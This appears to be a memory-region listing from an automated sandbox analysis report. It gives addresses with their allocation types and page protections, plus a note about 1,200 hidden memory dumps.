heap
page read and write
2681D866000
heap
page read and write
242A0000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2551C000
trusted library allocation
page read and write
2EE0000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
27200000
trusted library allocation
page read and write
6A15000
remote allocation
page execute and read and write
26540000
trusted library allocation
page read and write
DCE000
stack
page read and write
7E15000
remote allocation
page execute and read and write
7FFD9BA60000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
24C0F83D000
heap
page read and write
26806312000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
E0C000
stack
page read and write
7670000
trusted library allocation
page read and write
6D2E000
stack
page read and write
268071C9000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24715000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
27210000
trusted library allocation
page read and write
2430C000
trusted library allocation
page read and write
400000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24332000
trusted library allocation
page read and write
2652D000
stack
page read and write
26780000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
264E0000
trusted library allocation
page read and write
A37057E000
stack
page read and write
24C0F83B000
heap
page read and write
26540000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
520000
heap
page read and write
24C117BB000
heap
page read and write
1F3000
trusted library allocation
page execute and read and write
26530000
trusted library allocation
page read and write
25533000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
25322000
trusted library allocation
page read and write
24C11B60000
heap
page read and write
26476000
trusted library allocation
page read and write
2681D890000
heap
page read and write
550000
direct allocation
page read and write
252E3000
trusted library allocation
page read and write
269AF000
stack
page read and write
26530000
trusted library allocation
page read and write
268052C0000
heap
page execute and read and write
B5CBCFF000
stack
page read and write
26780000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
27110000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
2681DB36000
heap
page read and write
6DE0000
heap
page execute and read and write
B5CB9FE000
stack
page read and write
24743000
trusted library allocation
page read and write
24C0F850000
heap
page read and write
26530000
trusted library allocation
page read and write
24C117E3000
heap
page read and write
264C0000
trusted library allocation
page read and write
2F0A000
trusted library allocation
page execute and read and write
23EFE000
stack
page read and write
A370978000
stack
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
25636000
trusted library allocation
page read and write
A37184B000
stack
page read and write
7FFD9B760000
trusted library allocation
page read and write
268062DB000
trusted library allocation
page read and write
24C0F826000
heap
page read and write
6DE5000
heap
page execute and read and write
255E1000
trusted library allocation
page read and write
7FFD9B77B000
trusted library allocation
page read and write
268062F3000
trusted library allocation
page read and write
26491000
trusted library allocation
page read and write
C30000
direct allocation
page read and write
7630000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
6F6A000
stack
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
264C0000
trusted library allocation
page read and write
2692E000
stack
page read and write
87AC000
stack
page read and write
2696D000
stack
page read and write
416000
trusted library allocation
page execute and read and write
26A10000
trusted library allocation
page read and write
7450000
heap
page read and write
24C119C6000
heap
page read and write
27210000
trusted library allocation
page read and write
87C0000
trusted library allocation
page read and write
A3701CF000
stack
page read and write
47A8000
trusted library allocation
page read and write
24C0F832000
heap
page read and write
269F0000
trusted library allocation
page read and write
4215000
remote allocation
page execute and read and write
26530000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
25328000
trusted library allocation
page read and write
245D8000
trusted library allocation
page read and write
48D0000
heap
page read and write
253EB000
trusted library allocation
page read and write
264D0000
trusted library allocation
page read and write
2681DADA000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
7FFD9B9A0000
trusted library allocation
page read and write
27220000
trusted library allocation
page read and write
6CAE000
stack
page read and write
27110000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
24C0FA25000
heap
page read and write
252CB000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
245A8000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
24C117B7000
heap
page read and write
777000
heap
page read and write
A370BFE000
stack
page read and write
C20000
direct allocation
page read and write
268052A0000
trusted library allocation
page read and write
27220000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
24C0F876000
heap
page read and write
2648E000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
24C0F847000
heap
page read and write
26A10000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
26430000
heap
page read and write
26A10000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
2CC0000
heap
page read and write
7FFD9B816000
trusted library allocation
page read and write
81D0000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
271D0000
trusted library allocation
page read and write
2680630A000
trusted library allocation
page read and write
26805FDC000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
24482000
trusted library allocation
page read and write
271C0000
trusted library allocation
page read and write
7FFD9B945000
trusted library allocation
page read and write
7FFD9B947000
trusted library allocation
page read and write
24C117BE000
heap
page read and write
26A10000
trusted library allocation
page read and write
24C0FA10000
heap
page read and write
268071AA000
trusted library allocation
page read and write
BF0000
direct allocation
page read and write
26A10000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
A370473000
stack
page read and write
2681DE70000
heap
page read and write
26530000
trusted library allocation
page read and write
BE0000
direct allocation
page read and write
2539D000
trusted library allocation
page read and write
24C117DF000
heap
page read and write
26780000
trusted library allocation
page read and write
26805A7A000
trusted library allocation
page read and write
CCE000
stack
page read and write
27110000
trusted library allocation
page read and write
24370000
trusted library allocation
page read and write
25376000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
B5CC2FC000
stack
page read and write
A6D5000
direct allocation
page execute and read and write
2FBA000
heap
page read and write
255EE000
trusted library allocation
page read and write
268039A5000
heap
page read and write
27110000
trusted library allocation
page read and write
2681DB42000
heap
page read and write
7FFD9B911000
trusted library allocation
page read and write
240D0000
direct allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
26530000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
26780000
trusted library allocation
page read and write
24C0F844000
heap
page read and write
7680000
trusted library allocation
page read and write
253D5000
trusted library allocation
page read and write
27130000
trusted library allocation
page read and write
2681570A000
trusted library allocation
page read and write
26A10000
trusted library allocation
page read and write
C00000
direct allocation
page read and write
26803977000
heap
page read and write
2C8F000
stack
page read and write
There are 1200 hidden memdumps, click here to show them.